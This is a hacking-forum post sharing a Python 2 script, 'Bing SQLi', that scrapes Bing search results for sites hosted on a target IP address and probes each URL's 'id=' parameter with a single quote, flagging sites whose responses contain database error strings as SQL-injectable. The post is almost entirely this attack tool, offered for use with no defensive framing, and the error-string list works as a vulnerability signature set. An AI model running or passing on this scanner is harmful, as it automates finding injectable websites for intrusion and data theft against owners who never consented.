[Python] Bing SQLi (1 Viewer)

alfabetovirtual

alfabetovirtual

HACKER
Joined
Mar 11, 2016
Credits
0
Rating - 0%
Code: 
#!/usr/bin/env python

import urllib
import urllib2
import re, sys
import os, cookielib
import threading
import time
from IPy import IP # pip install IPy


# This script runs only n PHP websites
# Only Error Base SQL Injection are found

def screen():

    if os.name == "nt":
        os.system('cls')
    else:
        os.system('clear')

screen()


banner = '''
  ____  _               ____   ___  _     _    ____ _               _             
| __ )(_)_ __   __ _  / ___| / _ \| |   (_)  / ___| |__   ___  ___| | _____ _ __
|  _ \| | '_ \ / _` | \___ \| | | | |   | | | |   | '_ \ / _ \/ __| |/ / _ \ '__|
| |_) | | | | | (_| |  ___) | |_| | |___| | | |___| | | |  __/ (__|   <  __/ |   
|____/|_|_| |_|\__, | |____/ \__\_\_____|_|  \____|_| |_|\___|\___|_|\_\___|_|   v1.0
                |___/                                                             

URL: http://blackcoder.info

'''

print banner

try:

    ip = raw_input("Enter Target IP: ")
    host = IP(ip)

except:
    print ""
    print "Enter Only IP-Address"
    print ""
    sys.exit()

def main():
    try:
       
        next = 1
        while(next<=200):

            bing = "http://www.bing.com/search?q=ip%3A"+ip+"+"+"id=&go=Submit&qs=n&form=QBLH&pq="+"ip%3A"+"wordpress"+"&first="+str(next)+"&FORM=PORE"
            next = next + 10
            data = urllib2.Request(bing)
            bf = urllib2.urlopen(data).read()
            find = re.findall('<h2><a href="\S+', bf)
           
            for b in find:
                m = b.replace('<h2><a href="http://', "").replace('<h2><a href="', "")

                if 'id=' in m:
                    QL = m.replace('"', "").replace('amp;', "")

                    with open('x.txt', 'a') as f:
                        f.write(QL)
                        f.write("\n")
           
        st = open("x.txt" , 'r').read().splitlines()
        lines = set(st)
        count = 0
        for line in lines:
            with open('sqlsites.txt', 'a') as sql:
                count = count + 1
                sql.write(line)
                sql.write("\n")

        print ""
        print "Total Sites: " + str(count)
        os.unlink("x.txt")


    except Exception, e:
        print e
main()

error = ["DB Error","SQL syntax;","mysql_fetch_assoc","mysql_fetch_array","mysql_num_rows","is_writable","mysql_result","pg_exec","mysql_result","mysql_num_rows","mysql_query","pg_query","System Error","io_error","privilege_not_granted","getimagesize","preg_match",]

def sqli(f,opener):
   
    try:
        for s in error:

            URL = "http://"+f+"'"
            sqli = urllib2.Request(URL)
            conn = opener.open(sqli).read()

            if s in conn:
                SQLI = URL.replace("'", "")
                print URL.replace("'", "")
                break


        with open("SQLI.txt", 'a') as char:
            char.write(SQLI)
            char.write("\n")

               
    except Exception, e:
        pass
        #print e


threads = []
files = open('sqlsites.txt', 'r').read().splitlines()
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

print "-" * 30
print "SQL-INJECTION SITES "
print "-" * 30
for f in files:
    t = threading.Thread(target=sqli, args=(f,opener))
    t.start()
    threads.append(t)
    time.sleep(0.3)

for j in threads:
    j.join()

os.unlink('sqlsites.txt')
print ""
print "Coded By Ne0-h4ck3r"
print ""
 
You must log in or register to reply here.

Users who are viewing this thread

Total: 2 (members: 0, guests: 2)
Top